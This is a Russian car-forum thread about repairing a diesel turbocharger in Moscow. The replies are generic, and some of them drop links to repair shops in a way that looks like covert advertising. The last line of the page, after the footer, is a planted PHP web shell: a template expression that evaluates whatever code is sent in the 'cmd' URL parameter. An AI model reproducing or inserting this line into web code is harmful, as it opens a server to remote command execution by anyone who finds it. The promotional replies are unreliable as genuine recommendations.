+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Ремонт турбины


  1. #1
    Мимо проходил restav is on a distinguished road Аватар для restav
    Регистрация
    13.02.2019
    Сообщений
    38

    Ремонт турбины

    В последнее время стал замечать странные звуки в двигателе и когда его осматривал, то понял, что причина в турбине. Думаю, что её можно будет отремонтировать и на новую тратится не придется, но вот только кому в Москве можно доверить ремонт турбины дизельного двигателя?

  2. #2
    Мимо проходил persh is on a distinguished road Аватар для persh
    Регистрация
    25.02.2019
    Сообщений
    37
    Доверять ремонт турбины дизельного двигателя стоит только настоящим специалистам, которые хорошо разбираются в подобных вопросах. Поэтому я Вам рекомендую обращаться не в какой-то малоизвестный автосервис, а в проверенный, где ребята хорошо знаю свою работу.

  3. #3
    Мимо проходил everd is on a distinguished road Аватар для everd
    Регистрация
    24.01.2019
    Сообщений
    37
    Стоит хорошо подумать, нужно ли ремонтировать эту турбину или же будет надежнее приобрести новую. Конечно же всё зависит от серьезности поломки, если она незначительная, то можно отремонтировать и эту турбину. В противоположном случае покупайте новую и желательно оригинальную.

  4. #4
    Мимо проходил aint is on a distinguished road Аватар для aint
    Регистрация
    08.03.2019
    Сообщений
    37
    Разумеется, что надежнее всего будет купить новую турбину, но не все могут вот так просто потратить кучу денег на новую деталь. Что касается ремонта турбины, то тут всё сложно, хорошие специалисты берут много, а доверять ремонт неквалифицированным людям тоже не хочется. К слову говоря, ремонтом турбин дизельных двигателей в Москве занимается вот этот сервис: https://turboremont77.ru/remont-turb...ih-dvigateley/

  5. #5
    Новичок FedorPorter is on a distinguished road Аватар для FedorPorter
    Регистрация
    21.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    139
    Как показывает практика эксплуатации, всего можно выделить две основные причины поломок – некачественное или несвоевременное ТО. Если же по плану производить технический осмотр, то турбина будет работать долго и без особых нареканий со стороны автолюбителей.

  6. #6
    Мимо проходил Зверь is on a distinguished road Аватар для Зверь
    Регистрация
    03.12.2018
    Откуда
    Vselennaja
    Машина
    GTI
    Сообщений
    49
    Да, сейчас непросто подобрать качественный автосервис. Все мастера приписывают несуществующие поломки, чтобы увеличить сумму ремонта. Я уже и сменил вторую СТО, но тут так же обстоят дела. Еще мне знакомый рекомендовал вот этот московский автосервис https://автосервис-ювао.рф/ремонт_двигателя . Автор попробуйте там проверить двигатель и если проблема в турбине, её отремонтировать.

  7. #7
    Мимо проходил Neekodimus is on a distinguished road Аватар для Neekodimus
    Регистрация
    06.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    Ну да, вполне возможно что на автосервисе вам как раз такие проблемы то и порешают.

+ Ответить в теме

Похожие темы

  1. ремонт турбины на 5м GTi %(
    от KarlsonNet в разделе Ремонт и обслуживание
    Ответов: 14
    Последнее сообщение: 12.12.2021, 12:20
  2. Передув турбины
    от Mult в разделе Двигатель
    Ответов: 22
    Последнее сообщение: 25.11.2013, 16:52
  3. турбины на VAG
    от макс 902 в разделе Покупка и продажа запчастей
    Ответов: 29
    Последнее сообщение: 29.10.2013, 00:24
  4. Турбины
    от Lee в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 3
    Последнее сообщение: 23.09.2007, 00:32

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}